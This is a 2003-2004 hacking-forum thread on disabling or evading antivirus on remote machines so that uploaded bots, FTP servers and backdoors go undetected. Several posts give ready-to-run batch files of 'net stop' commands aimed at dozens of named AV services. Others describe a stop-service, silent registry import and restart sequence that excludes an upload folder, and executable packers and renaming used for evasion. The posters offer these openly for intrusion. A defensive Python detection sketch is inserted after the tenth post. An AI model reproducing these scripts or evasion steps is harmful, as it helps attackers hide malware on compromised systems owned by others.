Bypassing An Anti-virus?

#1 Yosam

  • Private First Class
  • Group: Members
  • Posts: 43
  • Joined: 06-September 03

Posted 16 September 2003 - 08:17 AM

Hi, I remember GSecur once posted how to disable or bypass an anti-virus
on a remote machine. I tried to search for it but had no luck.

Does anyone know how I can make the anti-virus not alert
about the files I upload to the remote machine?


Thanks in advance.
0

#2 Certox

  • Private First Class
  • Group: Members
  • Posts: 91
  • Joined: 09-September 03

Posted 16 September 2003 - 07:35 PM

I just rename the ext. I am guessing you're trying to put up an ftp and iroffer. And lots of anti-virus will delete it, so just name it iroffer.ex and servu.ex, then modify your bat to read them. If you can get your ftp up reg just do that, and if you are having problems getting your bat to start the bot just do: site exec iroffer.ex -b xdcc.config
It will start right up :)
Of course I don't mean for you to do anything illegal, so when trying to bypass your own anti-virus on your own computer, do that :P
0

#3 Jeeve5

  • Private First Class
  • Group: Members
  • Posts: 83
  • Joined: 17-September 03

Posted 17 September 2003 - 03:06 AM

Hi

The way I usually do it is:
1. stop the AV service
2. upload a registry hack that tells the AV to exclude all files in the dir you up your kit to
3. regedit /s patch.reg
4. restart the AV service

Usually works. The only exception I found is OfficeScan NT. The thing to do there is modify the exclude filenames to yourprog1.exe and yourprog2.exe

Hope that helped,
Jeeve5
0

#4 Imps2

  • Private First Class
  • Group: Members
  • Posts: 56
  • Joined: 30-July 03

Posted 17 September 2003 - 04:34 AM

Use a packer and rename your file or kill the AV ;)

net stop Mcshield
net stop "Norton Antivirus Service"
net stop "Panda Antivirus"
net stop "ZoneAlarm"
net stop "Detector de OfficeScanNT"
net stop "McAfee Framework Service"


Greetz Imps2
0

#5 Yosam

  • Private First Class
  • Group: Members
  • Posts: 43
  • Joined: 06-September 03

Posted 17 September 2003 - 04:38 AM

What is a packer exactly?
And what file are you talking about?

Can I just put this "code" that you gave me into a bat file
and run it on the machine?
0

#6 Jeeve5

  • Private First Class
  • Group: Members
  • Posts: 83
  • Joined: 17-September 03

Posted 17 September 2003 - 04:47 AM

The most common packer is UPX.

The 'code' he just gave you is to stop the AV services. Problem is that Norton usually recognizes packed files and therefore it is useless.
0

#7 Yosam

  • Private First Class
  • Group: Members
  • Posts: 43
  • Joined: 06-September 03

Posted 17 September 2003 - 04:49 AM

OK, but I didn't understand your method.

What is a registry hack?
Where can I find it?
0

#8 Imps2

  • Private First Class
  • Group: Members
  • Posts: 56
  • Joined: 30-July 03

Posted 17 September 2003 - 04:50 AM

A packer changes the size of your proggie and renames it so it's harder to detect by AV software.

You should be able to run the commands from a bat file.

Greetz Imps2
0

#9 miezmiez

  • Private
  • Group: Members
  • Posts: 9
  • Joined: 08-January 04

Posted 31 January 2004 - 07:31 AM

link to test your files online:

http://www.kaspersky...teviruschk.html

and the results are horrible:

Zu überprüfende Datei: server_.exe

server_.exe Komprimiert: ASPack
server_.exe Komprimiert: ASPack
server_.exe Komprimiert: Morphine
server_.exe Komprimiert: UPX
server_.exe Infiziert: Backdoor.Winshell.50

Kaspersky knows all known exe packers and has the depacker, I think ...

Does anybody have an unknown packer???
0

#10 Reaper527

  • Private First Class
  • Group: Members
  • Posts: 131
  • Joined: 14-January 04

Posted 31 January 2004 - 10:48 AM

Put the following code into av.bat

@echo off
net stop AVP32
net stop LOCKDOWN2000
net stop AVP.EXE
net stop CFINET32
net stop CFINET
net stop ICMON
net stop SAFEWEB
net stop WEBSCANX
net stop ANTIVIR
net stop MCAFEE
net stop NORTON
net stop NVC95
net stop FP-WIN
net stop IOMON98
net stop PCCWIN98
net stop F-PROT95
net stop F-STOPW
net stop PVIEW95
net stop NAVWNT
net stop NAVRUNR
net stop NAVLU32
net stop NAVAPSVC
net stop NISUM
net stop SYMPROXYSVC
net stop RESCUE32
net stop NISSERV
net stop ATRACK
net stop IAMAPP
net stop LUCOMSERVER
net stop LUALL
net stop NMAIN
net stop NAVW32
net stop NAVAPW32
net stop VSSTAT
net stop VSHWIN32
net stop AVSYNMGR
net stop AVCONSOL
net stop WEBTRAP
net stop POP3TRAP
net stop PCCMAIN
net stop PCCIOMON


It's a list I got from a friend. Basically just put that bat file on their comp and run it and it will attempt to stop a whole bunch of different AVs; odds are whatever they use is on that list somewhere.
0
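For defenders, the two patterns described in posts #3, #4 and #10 (a run of `net stop` commands, and a stop / silent `.reg` import / restart sequence) are visible in process-creation command lines. The following is an added detection sketch, not part of any post in this thread; the event tuple shape, host names, time window and burst threshold are assumptions, and the sample events are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events (host, time, command line).
# Shape is an assumption; service names are ones mentioned in the thread.
EVENTS = [
    ("ws01", "2004-01-31 10:00:01", "net stop NAVAPSVC"),
    ("ws01", "2004-01-31 10:00:02", "net stop Mcshield"),
    ("ws01", "2004-01-31 10:00:02", 'net stop "McAfee Framework Service"'),
    ("ws01", "2004-01-31 10:00:09", "regedit /s patch.reg"),
    ("ws01", "2004-01-31 10:00:15", "net start NAVAPSVC"),
    ("ws02", "2004-01-31 11:30:00", "net stop Spooler"),
    ("ws02", "2004-01-31 14:00:00", "regedit /s printer.reg"),
]

NET = re.compile(r'^\s*net1?(?:\.exe)?\s+(stop|start)\s+"?([^"]+?)"?\s*$', re.I)
REG = re.compile(r'^\s*regedit(?:\.exe)?\s+(?:.*\s)?/s\b', re.I)

def detect(events, window=timedelta(minutes=5), burst=3):
    """Alert on (a) `burst` service stops inside `window` on one host and
    (b) a service stopped, a silent .reg import, then the same service started."""
    alerts, stops, imports = [], {}, {}
    for host, ts, cmd in sorted(events, key=lambda e: e[1]):
        t = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        m = NET.match(cmd)
        if m and m.group(1).lower() == "stop":
            # Keep only stops still inside the sliding window, then add this one.
            recent = [s for s in stops.get(host, []) if t - s[0] <= window]
            recent.append((t, m.group(2).lower()))
            stops[host] = recent
            if len(recent) == burst:  # fire once when the threshold is reached
                alerts.append((host, "stop-burst", ts))
        elif REG.match(cmd):
            # A silent import only matters here if it follows a recent stop.
            if any(t - s[0] <= window for s in stops.get(host, [])):
                imports[host] = t
        elif m:  # net start
            svc = m.group(2).lower()
            stopped = any(s[1] == svc and t - s[0] <= window
                          for s in stops.get(host, []))
            if stopped and host in imports and t - imports[host] <= window:
                alerts.append((host, "stop-import-restart:" + svc, ts))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Service Control Manager event 7036 records the resulting service state changes and can corroborate the command-line signal.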

#11 Guest_LittleHacker_*

  • Group: Guests

Posted 31 January 2004 - 05:01 PM

Useful list.
I add AVG Antivirus by Grisoft. Services are

Quote

avgamsrv.exe  :    AVG alert Manager
avgcc.exe        :    AVG Control Center
avgemc.exe    :    AVG E-mail Scanner

and warn you about a VxD it uses. It will work even if you kill all these processes! :(
0

#12 Trojan^kid

  • Private First Class
  • Group: Members
  • Posts: 57
  • Joined: 07-January 04

Posted 01 February 2004 - 05:18 AM

Packers are a good choice to bypass Norton and other antivirus.
McAfee and ksv, I think hex edit is the only one :)
Cheers
0

#13 --Elite--

  • Private First Class
  • Group: Members
  • Posts: 90
  • Joined: 09-August 03

Posted 02 February 2004 - 11:16 AM

Your complete answer.

Seems the members completed my post enough to help ... :)
0

#14 globe7

  • Private First Class
  • Group: Members
  • Posts: 22
  • Joined: 02-February 04

Posted 02 February 2004 - 03:51 PM

I love the easy way:
look at the service list
and stop the anti-virus (:
0

#15 bjoernfun

  • Private First Class
  • Group: Members
  • Posts: 44
  • Joined: 03-September 03

Posted 02 February 2004 - 11:50 PM

Heya,

@Jeeve5 can you post the registry hack, so the AV will exclude the directory!


thanks
0
